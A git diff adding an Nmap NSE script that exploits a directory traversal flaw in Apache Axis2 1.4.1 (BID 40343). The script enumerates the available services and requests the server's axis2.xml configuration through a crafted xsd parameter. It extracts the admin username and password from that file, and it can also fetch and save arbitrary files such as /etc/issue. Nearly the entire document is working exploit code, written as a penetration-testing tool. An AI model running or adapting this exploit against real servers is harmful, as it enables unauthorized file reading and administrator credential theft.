diff options
Diffstat (limited to 'scripts/http-axis2-dir-traversal.nse')
| -rw-r--r-- | scripts/http-axis2-dir-traversal.nse | 197 |
1 files changed, 197 insertions, 0 deletions
diff --git a/scripts/http-axis2-dir-traversal.nse b/scripts/http-axis2-dir-traversal.nse new file mode 100644 index 0000000..bf90cac --- /dev/null +++ b/scripts/http-axis2-dir-traversal.nse @@ -0,0 +1,197 @@ +local creds = require "creds" +local http = require "http" +local io = require "io" +local nmap = require "nmap" +local shortport = require "shortport" +local stdnse = require "stdnse" +local string = require "string" +local table = require "table" + +description = [[ +Exploits a directory traversal vulnerability in Apache Axis2 version 1.4.1 by +sending a specially crafted request to the parameter <code>xsd</code> +(BID 40343). By default it will try to retrieve the configuration file of the +Axis2 service <code>'/conf/axis2.xml'</code> using the path +<code>'/axis2/services/'</code> to return the username and password of the +admin account. + +To exploit this vulnerability we need to detect a valid service running on the +installation so we extract it from <code>/listServices</code> before exploiting +the directory traversal vulnerability. By default it will retrieve the +configuration file, if you wish to retrieve other files you need to set the +argument <code>http-axis2-dir-traversal.file</code> correctly to traverse to +the file's directory. Ex. <code>../../../../../../../../../etc/issue</code> + +To check the version of an Apache Axis2 installation go to: +http://domain/axis2/services/Version/getVersion + +Reference: +* https://www.securityfocus.com/bid/40343 +* https://www.exploit-db.com/exploits/12721/ +]] + +--- +-- @usage +-- nmap -p80,8080 --script http-axis2-dir-traversal --script-args 'http-axis2-dir-traversal.file=../../../../../../../etc/issue' <host/ip> +-- nmap -p80 --script http-axis2-dir-traversal <host/ip> +-- +-- @output +-- 80/tcp open http syn-ack +-- |_http-axis2-dir-traversal.nse: Admin credentials found -> admin:axis2 +-- +-- @args http-axis2-dir-traversal.file Remote file to retrieve +-- @args http-axis2-dir-traversal.outfile Output file +-- @args http-axis2-dir-traversal.basepath Basepath to the services page. Default: <code>/axis2/services/</code> + +author = "Paulino Calderon <calderon@websec.mx>" +license = "Same as Nmap--See https://nmap.org/book/man-legal.html" +categories = {"vuln", "intrusive", "exploit"} + + +portrule = shortport.http + +--Default configuration values +local DEFAULT_FILE = "../conf/axis2.xml" +local DEFAULT_PATH = "/axis2/services/" + +--- +--Checks the given URI looks like an Apache Axis2 installation +-- @param host Host table +-- @param port Port table +-- @param path Apache Axis2 Basepath +-- @return True if the string "Available services" is found +local function check_installation(host, port, path) + local req = http.get(host, port, path) + if req.status == 200 and http.response_contains(req, "Available services") then + return true + end + return false +end + +--- +-- Returns a table with all the available services extracted +-- from the services list page +-- @param body Services list page body +-- @return Table containing the names and paths of the available services +local function get_available_services(body) + local services = {} + for service in string.gmatch(body, '<h4>Service%sDescription%s:%s<font%scolor="black">(.-)</font></h4>') do + table.insert(services, service) + end + + return services +end + +--- +--Writes string to file +--Taken from: hostmap.nse +-- @param filename Filename to write +-- @param contents Content of file +-- @return True if file was written successfully +local function write_file(filename, contents) + local f, err = io.open(filename, "w") + if not f then + return f, err + end + f:write(contents) + f:close() + return true +end + +--- +-- Extracts Axis2's credentials from the configuration file +-- It also adds them to the credentials library. +-- @param body Configuration file string +-- @return true if credentials are found +-- @return Credentials or error string +--- +local function extract_credentials(host, port, body) + local _,_,user = string.find(body, '<parameter name="userName">(.-)</parameter>') + local _,_,pass = string.find(body, '<parameter name="password">(.-)</parameter>') + + if user and pass then + local cred_obj = creds.Credentials:new( SCRIPT_NAME, host, port ) + cred_obj:add(user, pass, creds.State.VALID ) + return true, string.format("Admin credentials found -> %s:%s", user, pass) + end + return false, "Credentials were not found." +end + +action = function(host, port) + local outfile = stdnse.get_script_args("http-axis2-dir-traversal.outfile") + local rfile = stdnse.get_script_args("http-axis2-dir-traversal.file") or DEFAULT_FILE + local basepath = stdnse.get_script_args("http-axis2-dir-traversal.basepath") or DEFAULT_PATH + local selected_service, output + + --check this is an axis2 installation + if not(check_installation(host, port, basepath.."listServices")) then + stdnse.debug1("This does not look like an Apache Axis2 installation.") + return + end + + output = {} + --process list of available services + local req = http.get( host, port, basepath.."listServices") + local services = get_available_services(req.body) + + --generate debug info for services and select first one to be used in the request + if #services > 0 then + for _, servname in pairs(services) do + stdnse.debug1("Service found: %s", servname) + end + selected_service = services[1] + else + if nmap.verbosity() >= 2 then + stdnse.debug1("There are no services available. We can't exploit this") + end + return + end + + --Use selected service and exploit + stdnse.debug1("Querying service: %s", selected_service) + req = http.get(host, port, basepath..selected_service.."?xsd="..rfile) + stdnse.debug2("Query -> %s", basepath..selected_service.."?xsd="..rfile) + + --response came back + if req.status and req.status == 200 then + --if body is empty something wrong could have happened... + if string.len(req.body) <= 0 then + if nmap.verbosity() >= 2 then + stdnse.debug1("Response was empty. The file does not exists or the web server does not have sufficient permissions") + end + return + end + + output[#output+1] = "\nApache Axis2 Directory Traversal (BID 40343)" + + --Retrieve file or only show credentials if downloading the configuration file + if rfile ~= DEFAULT_FILE then + output[#output+1] = req.body + else + --try to extract credentials + local extract_st, extract_msg = extract_credentials(host, port, req.body) + if extract_st then + output[#output+1] = extract_msg + else + stdnse.debug1("Credentials not found in configuration file") + end + end + + --save to file if selected + if outfile then + local status, err = write_file(outfile, req.body) + if status then + output[#output+1] = string.format("%s saved to %s\n", rfile, outfile) + else + output[#output+1] = string.format("Error saving %s to %s: %s\n", rfile, outfile, err) + end + end + else + stdnse.debug1("Request did not return status 200. File might not be found or unreadable") + return + end + + if #output > 0 then + return table.concat(output, "\n") + end +end |